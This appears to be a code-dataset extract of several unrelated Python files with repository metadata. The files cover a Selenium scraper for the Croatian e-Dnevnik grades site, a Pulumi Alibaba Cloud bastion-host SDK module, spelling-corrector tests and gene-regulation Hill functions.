| 0
| 0
|
0
| 9
|
3751d3596a32979b95ddd2523fef9f29e3bf7492
| 173
|
py
|
Python
|
sosia/establishing/__init__.py
|
sosia-dev/sosia
|
d4d2d5edb0cd1d085b5a457eb6d19bf8e9fea7f5
|
[
"MIT"
] | 14
|
2019-03-12T22:07:47.000Z
|
2022-03-08T14:05:05.000Z
|
sosia/establishing/__init__.py
|
sosia-dev/sosia
|
d4d2d5edb0cd1d085b5a457eb6d19bf8e9fea7f5
|
[
"MIT"
] | 31
|
2018-10-15T16:02:44.000Z
|
2021-04-09T08:13:44.000Z
|
sosia/establishing/__init__.py
|
sosia-dev/sosia
|
d4d2d5edb0cd1d085b5a457eb6d19bf8e9fea7f5
|
[
"MIT"
] | 2
|
2020-01-09T06:47:09.000Z
|
2020-12-05T13:21:03.000Z
|
from sosia.establishing.config import *
from sosia.establishing.constants import *
from sosia.establishing.database import *
from sosia.establishing.fields_sources import *
| 34.6
| 47
| 0.83815
| 21
| 173
| 6.857143
| 0.428571
| 0.25
| 0.583333
| 0.5625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.092486
| 173
| 4
| 48
| 43.25
| 0.917197
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
805d2e10e957e70e749b95821942bd42c89d0b08
| 7,158
|
py
|
Python
|
main.py
|
Parzival32/e-Dnevnik_API
|
8f9ef8ef062a550dbcb21dbfe99b2274df2b4857
|
[
"MIT"
] | null | null | null |
main.py
|
Parzival32/e-Dnevnik_API
|
8f9ef8ef062a550dbcb21dbfe99b2274df2b4857
|
[
"MIT"
] | null | null | null |
main.py
|
Parzival32/e-Dnevnik_API
|
8f9ef8ef062a550dbcb21dbfe99b2274df2b4857
|
[
"MIT"
] | null | null | null |
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
class api:
def __init__(self,username, passowrd, path):
self.username = username
self.password = passowrd
self.path = path
loginFailed = 'Login failed'
def auth(self):
chrome_options = Options()
chrome_options.add_argument("--headless")
driver = webdriver.Chrome(self.path, options=chrome_options)
driver.get("https://ocjene.skole.hr/login")
username = driver.find_element_by_name("username")
password = driver.find_element_by_name("password")
submit = driver.find_element_by_xpath('//input[@type="submit"]')
username.send_keys(self.username)
password.send_keys(self.password)
submit.click()
if driver.current_url == 'https://ocjene.skole.hr/course': driver.close(); return True
else: driver.close(); return self.loginFailed
def grade(self):
chrome_options = Options()
chrome_options.add_argument("--headless")
driver = webdriver.Chrome(self.path, options=chrome_options)
driver.get("https://ocjene.skole.hr/login")
username = driver.find_element_by_name("username")
password = driver.find_element_by_name("password")
submit = driver.find_element_by_xpath('//input[@type="submit"]')
username.send_keys(self.username)
password.send_keys(self.password)
submit.click()
if driver.current_url != 'https://ocjene.skole.hr/course': driver.close(); return self.loginFailed
grade_position = driver.find_element_by_xpath('//*[@id="class-administration-menu"]/div[1]/div/div[1]/span[1]')
grade = grade_position.text
driver.close()
return grade
def nameSurname(self):
info = []
chrome_options = Options()
chrome_options.add_argument("--headless")
driver = webdriver.Chrome(self.path, options=chrome_options)
driver.get("https://ocjene.skole.hr/login")
username = driver.find_element_by_name("username")
password = driver.find_element_by_name("password")
submit = driver.find_element_by_xpath('//input[@type="submit"]')
username.send_keys(self.username)
password.send_keys(self.password)
submit.click()
if driver.current_url != 'https://ocjene.skole.hr/course': driver.close(); return self.loginFailed
nameSurnamePosition = driver.find_element_by_xpath('//*[@id="header"]/div[2]/div/span')
nameSurname = nameSurnamePosition.text
name, surname = nameSurname.split()
info.append(name)
info.append(surname)
driver.close()
return info
def userNumber(self):
chrome_options = Options()
chrome_options.add_argument("--headless")
driver = webdriver.Chrome(self.path, options=chrome_options)
driver.get("https://ocjene.skole.hr/login")
username = driver.find_element_by_name("username")
password = driver.find_element_by_name("password")
submit = driver.find_element_by_xpath('//input[@type="submit"]')
username.send_keys(self.username)
password.send_keys(self.password)
submit.click()
if driver.current_url != 'https://ocjene.skole.hr/course': driver.close(); return self.loginFailed
driver.get("https://ocjene.skole.hr/personal_data")
userNumberPosition = driver.find_element_by_xpath('//*[@id="page-wrapper"]/div[4]/div/div[2]/span[2]')
userNumber = userNumberPosition.text
driver.close()
return userNumber
def getClassYear(self):
chrome_options = Options()
chrome_options.add_argument("--headless")
driver = webdriver.Chrome(self.path, options=chrome_options)
driver.get("https://ocjene.skole.hr/login")
username = driver.find_element_by_name("username")
password = driver.find_element_by_name("password")
submit = driver.find_element_by_xpath('//input[@type="submit"]')
username.send_keys(self.username)
password.send_keys(self.password)
submit.click()
if driver.current_url != 'https://ocjene.skole.hr/course': driver.close(); return self.loginFailed
year_position = driver.find_element_by_xpath('//*[@id="class-administration-menu"]/div[1]/div/div[1]/span[2]')
year = year_position.text
driver.close()
return year
def getSchool(self):
chrome_options = Options()
chrome_options.add_argument("--headless")
driver = webdriver.Chrome(self.path, options=chrome_options)
driver.get("https://ocjene.skole.hr/login")
username = driver.find_element_by_name("username")
password = driver.find_element_by_name("password")
submit = driver.find_element_by_xpath('//input[@type="submit"]')
username.send_keys(self.username)
password.send_keys(self.password)
submit.click()
if driver.current_url != 'https://ocjene.skole.hr/course': driver.close(); return self.loginFailed
school_position = driver.find_element_by_xpath('//*[@id="class-administration-menu"]/div[1]/div/div[2]/div[1]/span[1]')
school = school_position.text
driver.close()
return school
def userInfo(self):
information = []
chrome_options = Options()
chrome_options.add_argument("--headless")
driver = webdriver.Chrome(self.path, options=chrome_options)
driver.get("https://ocjene.skole.hr/login")
username = driver.find_element_by_name("username")
password = driver.find_element_by_name("password")
submit = driver.find_element_by_xpath('//input[@type="submit"]')
username.send_keys(self.username)
password.send_keys(self.password)
submit.click()
if driver.current_url != 'https://ocjene.skole.hr/course': driver.close(); return self.loginFailed
grade_position = driver.find_element_by_xpath('//*[@id="class-administration-menu"]/div[1]/div/div[1]/span[1]')
grade = grade_position.text
nameSurnamePosition = driver.find_element_by_xpath('//*[@id="header"]/div[2]/div/span')
nameSurname = nameSurnamePosition.text
name , surname = nameSurname.split()
year_position = driver.find_element_by_xpath('//*[@id="class-administration-menu"]/div[1]/div/div[1]/span[2]')
year = year_position.text
school_position = driver.find_element_by_xpath('//*[@id="class-administration-menu"]/div[1]/div/div[2]/div[1]/span[1]')
school = school_position.text
driver.get("https://ocjene.skole.hr/personal_data")
userNumberPosition = driver.find_element_by_xpath('//*[@id="page-wrapper"]/div[4]/div/div[2]/span[2]')
userNumber = userNumberPosition.text
information.append(name)
information.append(surname)
information.append(grade)
information.append(userNumber)
information.append(year)
information.append(school)
driver.close()
return information
| 37.47644
| 127
| 0.659821
| 839
| 7,158
| 5.438617
| 0.091776
| 0.067938
| 0.115494
| 0.129082
| 0.877712
| 0.860837
| 0.860837
| 0.860837
| 0.860837
| 0.860837
| 0
| 0.004911
| 0.203409
| 7,158
| 191
| 128
| 37.47644
| 0.795335
| 0
| 0
| 0.76259
| 0
| 0.057554
| 0.194441
| 0.099316
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057554
| false
| 0.115108
| 0.014388
| 0
| 0.129496
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
80624d1280a0eb18b210f33d8b8631a74882c8c8
| 17,010
|
py
|
Python
|
sdk/python/pulumi_alicloud/bastionhost/host_account_user_group_attachment.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 42
|
2019-03-18T06:34:37.000Z
|
2022-03-24T07:08:57.000Z
|
sdk/python/pulumi_alicloud/bastionhost/host_account_user_group_attachment.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 152
|
2019-04-15T21:03:44.000Z
|
2022-03-29T18:00:57.000Z
|
sdk/python/pulumi_alicloud/bastionhost/host_account_user_group_attachment.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2020-08-26T17:30:07.000Z
|
2021-07-05T01:37:45.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['HostAccountUserGroupAttachmentArgs', 'HostAccountUserGroupAttachment']
@pulumi.input_type
class HostAccountUserGroupAttachmentArgs:
def __init__(__self__, *,
host_account_ids: pulumi.Input[Sequence[pulumi.Input[str]]],
host_id: pulumi.Input[str],
instance_id: pulumi.Input[str],
user_group_id: pulumi.Input[str]):
"""
The set of arguments for constructing a HostAccountUserGroupAttachment resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] host_account_ids: A list IDs of the host account.
:param pulumi.Input[str] host_id: The ID of the host.
:param pulumi.Input[str] instance_id: The ID of the Bastionhost instance where you want to authorize the user group to manage the specified hosts and host accounts.
:param pulumi.Input[str] user_group_id: The ID of the user group that you want to authorize to manage the specified hosts and host accounts.
"""
pulumi.set(__self__, "host_account_ids", host_account_ids)
pulumi.set(__self__, "host_id", host_id)
pulumi.set(__self__, "instance_id", instance_id)
pulumi.set(__self__, "user_group_id", user_group_id)
@property
@pulumi.getter(name="hostAccountIds")
def host_account_ids(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
A list IDs of the host account.
"""
return pulumi.get(self, "host_account_ids")
@host_account_ids.setter
def host_account_ids(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "host_account_ids", value)
@property
@pulumi.getter(name="hostId")
def host_id(self) -> pulumi.Input[str]:
"""
The ID of the host.
"""
return pulumi.get(self, "host_id")
@host_id.setter
def host_id(self, value: pulumi.Input[str]):
pulumi.set(self, "host_id", value)
@property
@pulumi.getter(name="instanceId")
def instance_id(self) -> pulumi.Input[str]:
"""
The ID of the Bastionhost instance where you want to authorize the user group to manage the specified hosts and host accounts.
"""
return pulumi.get(self, "instance_id")
@instance_id.setter
def instance_id(self, value: pulumi.Input[str]):
pulumi.set(self, "instance_id", value)
@property
@pulumi.getter(name="userGroupId")
def user_group_id(self) -> pulumi.Input[str]:
"""
The ID of the user group that you want to authorize to manage the specified hosts and host accounts.
"""
return pulumi.get(self, "user_group_id")
@user_group_id.setter
def user_group_id(self, value: pulumi.Input[str]):
pulumi.set(self, "user_group_id", value)
@pulumi.input_type
class _HostAccountUserGroupAttachmentState:
def __init__(__self__, *,
host_account_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
host_id: Optional[pulumi.Input[str]] = None,
instance_id: Optional[pulumi.Input[str]] = None,
user_group_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering HostAccountUserGroupAttachment resources.
:param pulumi.Input[Sequence[pulumi.Input[str]]] host_account_ids: A list IDs of the host account.
:param pulumi.Input[str] host_id: The ID of the host.
:param pulumi.Input[str] instance_id: The ID of the Bastionhost instance where you want to authorize the user group to manage the specified hosts and host accounts.
:param pulumi.Input[str] user_group_id: The ID of the user group that you want to authorize to manage the specified hosts and host accounts.
"""
if host_account_ids is not None:
pulumi.set(__self__, "host_account_ids", host_account_ids)
if host_id is not None:
pulumi.set(__self__, "host_id", host_id)
if instance_id is not None:
pulumi.set(__self__, "instance_id", instance_id)
if user_group_id is not None:
pulumi.set(__self__, "user_group_id", user_group_id)
@property
@pulumi.getter(name="hostAccountIds")
def host_account_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list IDs of the host account.
"""
return pulumi.get(self, "host_account_ids")
@host_account_ids.setter
def host_account_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "host_account_ids", value)
@property
@pulumi.getter(name="hostId")
def host_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the host.
"""
return pulumi.get(self, "host_id")
@host_id.setter
def host_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host_id", value)
@property
@pulumi.getter(name="instanceId")
def instance_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Bastionhost instance where you want to authorize the user group to manage the specified hosts and host accounts.
"""
return pulumi.get(self, "instance_id")
@instance_id.setter
def instance_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "instance_id", value)
@property
@pulumi.getter(name="userGroupId")
def user_group_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the user group that you want to authorize to manage the specified hosts and host accounts.
"""
return pulumi.get(self, "user_group_id")
@user_group_id.setter
def user_group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_group_id", value)
class HostAccountUserGroupAttachment(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
host_account_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
host_id: Optional[pulumi.Input[str]] = None,
instance_id: Optional[pulumi.Input[str]] = None,
user_group_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a Bastion Host Host Account Attachment resource to add list host accounts into one user group.
> **NOTE:** Available in v1.135.0+.
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
default_host = alicloud.bastionhost.Host("defaultHost",
instance_id="bastionhost-cn-tl32bh0no30",
host_name=var["name"],
active_address_type="Private",
host_private_address="172.16.0.10",
os_type="Linux",
source="Local")
default_host_account = []
for range in [{"value": i} for i in range(0, 3)]:
default_host_account.append(alicloud.bastionhost.HostAccount(f"defaultHostAccount-{range['value']}",
instance_id=default_host.instance_id,
host_account_name=f"example_value-{range['value']}",
host_id=default_host.host_id,
protocol_name="SSH",
password="YourPassword12345"))
default_user_group = alicloud.bastionhost.UserGroup("defaultUserGroup",
instance_id="bastionhost-cn-tl32bh0no30",
user_group_name=var["name"])
default_host_account_user_group_attachment = alicloud.bastionhost.HostAccountUserGroupAttachment("defaultHostAccountUserGroupAttachment",
instance_id=default_host.instance_id,
user_group_id=default_user_group.user_group_id,
host_id=default_host.host_id,
host_account_ids=[__item.host_account_id for __item in default_host_account])
```
## Import
Bastion Host Host Account can be imported using the id, e.g.
```sh
$ pulumi import alicloud:bastionhost/hostAccountUserGroupAttachment:HostAccountUserGroupAttachment example <instance_id>:<user_group_id>:<host_id>
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] host_account_ids: A list IDs of the host account.
:param pulumi.Input[str] host_id: The ID of the host.
:param pulumi.Input[str] instance_id: The ID of the Bastionhost instance where you want to authorize the user group to manage the specified hosts and host accounts.
:param pulumi.Input[str] user_group_id: The ID of the user group that you want to authorize to manage the specified hosts and host accounts.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: HostAccountUserGroupAttachmentArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Bastion Host Host Account Attachment resource to add list host accounts into one user group.
> **NOTE:** Available in v1.135.0+.
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
default_host = alicloud.bastionhost.Host("defaultHost",
instance_id="bastionhost-cn-tl32bh0no30",
host_name=var["name"],
active_address_type="Private",
host_private_address="172.16.0.10",
os_type="Linux",
source="Local")
default_host_account = []
for range in [{"value": i} for i in range(0, 3)]:
default_host_account.append(alicloud.bastionhost.HostAccount(f"defaultHostAccount-{range['value']}",
instance_id=default_host.instance_id,
host_account_name=f"example_value-{range['value']}",
host_id=default_host.host_id,
protocol_name="SSH",
password="YourPassword12345"))
default_user_group = alicloud.bastionhost.UserGroup("defaultUserGroup",
instance_id="bastionhost-cn-tl32bh0no30",
user_group_name=var["name"])
default_host_account_user_group_attachment = alicloud.bastionhost.HostAccountUserGroupAttachment("defaultHostAccountUserGroupAttachment",
instance_id=default_host.instance_id,
user_group_id=default_user_group.user_group_id,
host_id=default_host.host_id,
host_account_ids=[__item.host_account_id for __item in default_host_account])
```
## Import
Bastion Host Host Account can be imported using the id, e.g.
```sh
$ pulumi import alicloud:bastionhost/hostAccountUserGroupAttachment:HostAccountUserGroupAttachment example <instance_id>:<user_group_id>:<host_id>
```
:param str resource_name: The name of the resource.
:param HostAccountUserGroupAttachmentArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(HostAccountUserGroupAttachmentArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
host_account_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
host_id: Optional[pulumi.Input[str]] = None,
instance_id: Optional[pulumi.Input[str]] = None,
user_group_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = HostAccountUserGroupAttachmentArgs.__new__(HostAccountUserGroupAttachmentArgs)
if host_account_ids is None and not opts.urn:
raise TypeError("Missing required property 'host_account_ids'")
__props__.__dict__["host_account_ids"] = host_account_ids
if host_id is None and not opts.urn:
raise TypeError("Missing required property 'host_id'")
__props__.__dict__["host_id"] = host_id
if instance_id is None and not opts.urn:
raise TypeError("Missing required property 'instance_id'")
__props__.__dict__["instance_id"] = instance_id
if user_group_id is None and not opts.urn:
raise TypeError("Missing required property 'user_group_id'")
__props__.__dict__["user_group_id"] = user_group_id
super(HostAccountUserGroupAttachment, __self__).__init__(
'alicloud:bastionhost/hostAccountUserGroupAttachment:HostAccountUserGroupAttachment',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
host_account_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
host_id: Optional[pulumi.Input[str]] = None,
instance_id: Optional[pulumi.Input[str]] = None,
user_group_id: Optional[pulumi.Input[str]] = None) -> 'HostAccountUserGroupAttachment':
"""
Get an existing HostAccountUserGroupAttachment resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] host_account_ids: A list IDs of the host account.
:param pulumi.Input[str] host_id: The ID of the host.
:param pulumi.Input[str] instance_id: The ID of the Bastionhost instance where you want to authorize the user group to manage the specified hosts and host accounts.
:param pulumi.Input[str] user_group_id: The ID of the user group that you want to authorize to manage the specified hosts and host accounts.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _HostAccountUserGroupAttachmentState.__new__(_HostAccountUserGroupAttachmentState)
__props__.__dict__["host_account_ids"] = host_account_ids
__props__.__dict__["host_id"] = host_id
__props__.__dict__["instance_id"] = instance_id
__props__.__dict__["user_group_id"] = user_group_id
return HostAccountUserGroupAttachment(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="hostAccountIds")
def host_account_ids(self) -> pulumi.Output[Sequence[str]]:
"""
A list IDs of the host account.
"""
return pulumi.get(self, "host_account_ids")
@property
@pulumi.getter(name="hostId")
def host_id(self) -> pulumi.Output[str]:
"""
The ID of the host.
"""
return pulumi.get(self, "host_id")
@property
@pulumi.getter(name="instanceId")
def instance_id(self) -> pulumi.Output[str]:
"""
The ID of the Bastionhost instance where you want to authorize the user group to manage the specified hosts and host accounts.
"""
return pulumi.get(self, "instance_id")
@property
@pulumi.getter(name="userGroupId")
def user_group_id(self) -> pulumi.Output[str]:
"""
The ID of the user group that you want to authorize to manage the specified hosts and host accounts.
"""
return pulumi.get(self, "user_group_id")
| 44.881266
| 172
| 0.65873
| 2,059
| 17,010
| 5.174356
| 0.094221
| 0.071241
| 0.070959
| 0.019711
| 0.812183
| 0.796227
| 0.786934
| 0.76009
| 0.74648
| 0.727332
| 0
| 0.004763
| 0.247149
| 17,010
| 378
| 173
| 45
| 0.82719
| 0.407937
| 0
| 0.564972
| 1
| 0
| 0.11642
| 0.01974
| 0
| 0
| 0
| 0
| 0
| 1
| 0.152542
| false
| 0.00565
| 0.028249
| 0
| 0.271186
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
80a5408b335eed74b00a7bd72beabf1350c963ce
| 4,010
|
py
|
Python
|
test_spelling_corrector.py
|
mustafaKus/spellcheck
|
11f6f923b1427176781bd39cba9aa5d14130332d
|
[
"MIT"
] | 6
|
2020-12-20T07:22:08.000Z
|
2022-02-02T07:14:36.000Z
|
test_spelling_corrector.py
|
mustafaKus/spellcheck
|
11f6f923b1427176781bd39cba9aa5d14130332d
|
[
"MIT"
] | null | null | null |
test_spelling_corrector.py
|
mustafaKus/spellcheck
|
11f6f923b1427176781bd39cba9aa5d14130332d
|
[
"MIT"
] | null | null | null |
"""Implements the test class for the spelling corrector"""
import json
import logging
import os
import sys
import unittest
from unittest import TestCase
from spelling_corrector import NorvigCorrector, SymmetricDeleteCorrector
class SpellingCorrectorTest(TestCase):
"""Implements the test class for the spelling corrector"""
def test_norvig_corrector(self):
"""Tests the norvig corrector"""
current_working_directory = os.path.abspath(os.getcwd())
tests_directory = os.path.join(current_working_directory, "tests")
logging.info("Tests the norvig corrector")
logging.info("Tests directory is %s" % tests_directory)
for test_directory_name in os.listdir(tests_directory):
logging.info("Testing in %s directory" % test_directory_name)
test_directory_path = os.path.join(tests_directory, test_directory_name)
dictionary_path = os.path.join(test_directory_path, "dictionary.txt")
test_input_2_expected_output_path = os.path.join(test_directory_path, "input_2_expected_output.json")
word_2_frequency = {}
with open(dictionary_path, "r") as dictionary_file:
logging.info("Reading the dictionary %s" % test_directory_name)
dictionary_lines = dictionary_file.readlines()
for _, line in enumerate(dictionary_lines):
word, frequency_value = line.strip().split()
word_2_frequency[word.lower()] = int(frequency_value)
spelling_corrector = NorvigCorrector(word_2_frequency)
with open(test_input_2_expected_output_path) as input_2_expected_output_file:
logging.info("Reading the test data")
input_2_expected_output = json.load(input_2_expected_output_file)
for input_, expected_output in input_2_expected_output.items():
logging.info("Expected output for the input '%s' is '%s'" % (input_, expected_output))
self.assertEqual(expected_output, spelling_corrector.correct(input_))
def test_symmetric_delete_corrector(self):
"""Tests the symmetric delete corrector"""
current_working_directory = os.path.abspath(os.getcwd())
tests_directory = os.path.join(current_working_directory, "tests")
logging.info("Tests the symmetric delete corrector")
logging.info("Tests directory is %s" % tests_directory)
for test_directory_name in os.listdir(tests_directory):
logging.info("Testing in %s directory" % test_directory_name)
test_directory_path = os.path.join(tests_directory, test_directory_name)
dictionary_path = os.path.join(test_directory_path, "dictionary.txt")
test_input_2_expected_output_path = os.path.join(test_directory_path, "input_2_expected_output.json")
word_2_frequency = {}
with open(dictionary_path, "r") as dictionary_file:
logging.info("Reading the dictionary %s" % test_directory_name)
dictionary_lines = dictionary_file.readlines()
for _, line in enumerate(dictionary_lines):
word, frequency_value = line.strip().split()
word_2_frequency[word.lower()] = int(frequency_value)
spelling_corrector = SymmetricDeleteCorrector(word_2_frequency)
with open(test_input_2_expected_output_path) as input_2_expected_output_file:
logging.info("Reading the test data")
input_2_expected_output = json.load(input_2_expected_output_file)
for input_, expected_output in input_2_expected_output.items():
logging.info("Expected output for the input '%s' is '%s'" % (input_, expected_output))
self.assertEqual(expected_output, spelling_corrector.correct(input_))
if __name__ == '__main__':
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
unittest.main()
| 55.694444
| 113
| 0.684289
| 473
| 4,010
| 5.46723
| 0.154334
| 0.119103
| 0.075793
| 0.108275
| 0.856148
| 0.841454
| 0.841454
| 0.841454
| 0.806651
| 0.806651
| 0
| 0.006485
| 0.230923
| 4,010
| 71
| 114
| 56.478873
| 0.832036
| 0.042145
| 0
| 0.711864
| 0
| 0
| 0.112565
| 0.01466
| 0
| 0
| 0
| 0
| 0.033898
| 1
| 0.033898
| false
| 0
| 0.118644
| 0
| 0.169492
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
03f90b9c017571d5e21e3b7da29f1645b4a33491
| 85
|
py
|
Python
|
service/models/__init__.py
|
CottageLabs/lodestone
|
2e60f2138a49633398655bb7f728fd3d6ac92c43
|
[
"Apache-2.0"
] | null | null | null |
service/models/__init__.py
|
CottageLabs/lodestone
|
2e60f2138a49633398655bb7f728fd3d6ac92c43
|
[
"Apache-2.0"
] | null | null | null |
service/models/__init__.py
|
CottageLabs/lodestone
|
2e60f2138a49633398655bb7f728fd3d6ac92c43
|
[
"Apache-2.0"
] | null | null | null |
from service.models.ethesis import Ethesis
from service.models.dataset import Dataset
| 42.5
| 42
| 0.870588
| 12
| 85
| 6.166667
| 0.5
| 0.297297
| 0.459459
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082353
| 85
| 2
| 43
| 42.5
| 0.948718
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ff18e68d25414cdb3fdcaa970634bcf4be8109ba
| 7,008
|
py
|
Python
|
biocircuits/reg.py
|
justinbois/biocircuits
|
4f696be5a240ce6157e331d67bb78c3b2b3b88cf
|
[
"BSD-3-Clause"
] | 3
|
2021-03-08T06:19:39.000Z
|
2022-03-27T12:59:51.000Z
|
biocircuits/reg.py
|
justinbois/be150
|
96afe62ff40276f81d8a86eaa7b54d442517eec7
|
[
"BSD-3-Clause"
] | 7
|
2019-04-14T22:14:20.000Z
|
2021-05-07T16:51:05.000Z
|
biocircuits/reg.py
|
justinbois/be150
|
96afe62ff40276f81d8a86eaa7b54d442517eec7
|
[
"BSD-3-Clause"
] | 4
|
2019-04-14T21:24:55.000Z
|
2022-03-27T12:59:58.000Z
|
def rep_hill(x, n):
"""Dimensionless production rate for a gene repressed by x.
Parameters
----------
x : float or NumPy array
Concentration of repressor.
n : float
Hill coefficient.
Returns
-------
output : NumPy array or float
1 / (1 + x**n)
"""
return 1.0 / (1.0 + x ** n)
def act_hill(x, n):
"""Dimensionless production rate for a gene activated by x.
Parameters
----------
x : float or NumPy array
Concentration of activator.
n : float
Hill coefficient.
Returns
-------
output : NumPy array or float
x**n / (1 + x**n)
"""
return 1.0 - rep_hill(x, n)
def aa_and(x, y, nx, ny):
"""Dimensionless production rate for a gene regulated by two
activators with AND logic in the absence of leakage.
Parameters
----------
x : float or NumPy array
Concentration of first activator.
y : float or NumPy array
Concentration of second activator.
nx : float
Hill coefficient for first activator.
ny : float
Hill coefficient for second activator.
Returns
-------
output : NumPy array or float
x**nx * y**ny / (1 + x**nx) / (1 + y**ny)
"""
return x ** nx * y ** ny / (1.0 + x ** nx) / (1.0 + y ** ny)
def aa_or(x, y, nx, ny):
"""Dimensionless production rate for a gene regulated by two
activators with OR logic in the absence of leakage.
Parameters
----------
x : float or NumPy array
Concentration of first activator.
y : float or NumPy array
Concentration of second activator.
nx : float
Hill coefficient for first activator.
ny : float
Hill coefficient for second activator.
Returns
-------
output : NumPy array or float
(x**nx + y**ny + x**nx * y**ny) / (1 + x**nx) / (1 + y**ny)
"""
denom = (1.0 + x ** nx) * (1.0 + y ** ny)
return (denom - 1.0) / denom
def aa_or_single(x, y, nx, ny):
"""Dimensionless production rate for a gene regulated by two
activators with OR logic in the absence of leakage with single
occupancy.
Parameters
----------
x : float or NumPy array
Concentration of first activator.
y : float or NumPy array
Concentration of second activator.
nx : float
Hill coefficient for first activator.
ny : float
Hill coefficient for second activator.
Returns
-------
output : NumPy array or float
(x**nx + y**ny) / (1 + x**nx + y**ny)
"""
num = x ** nx + y ** ny
return num / (1.0 + num)
